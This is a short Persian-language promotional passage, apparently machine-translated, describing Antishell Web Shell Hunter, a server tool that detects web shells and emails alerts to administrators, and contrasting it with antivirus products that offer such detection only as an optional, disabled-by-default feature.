پیام های موجود در مورد اشیاء یافت می شود به مدیر سیستم توسط ایمیل ارسال می شود. او نیازی به شخصا به دنبال فرآیند نیست.

تا به امروز، Antishell Web Shell Hunter تنها ابزار متمرکز بر تشخیص پوسته های وب است. تعدادی از برنامه های کاربردی آنتی ویروس شامل یک تابع مشابه هستند، اما تنها در قالب یک گزینه اضافی، که به طور پیش فرض غیر فعال است. به عنوان یک قاعده، آنها صرفا بر اساس تجزیه و تحلیل زنگ هشدار، به طوری که اثربخشی آنها بسیار مورد نیاز است.

از آنجایی که استفاده از پوسته های وب برای حملات به سرورها بیشتر و بیشتر رایج است، منطقی است که سیستم را با استفاده از یک راه حل تخصصی محافظت کنیم. همانطور که می گویند، امنیت هرگز بیش از حد نیست.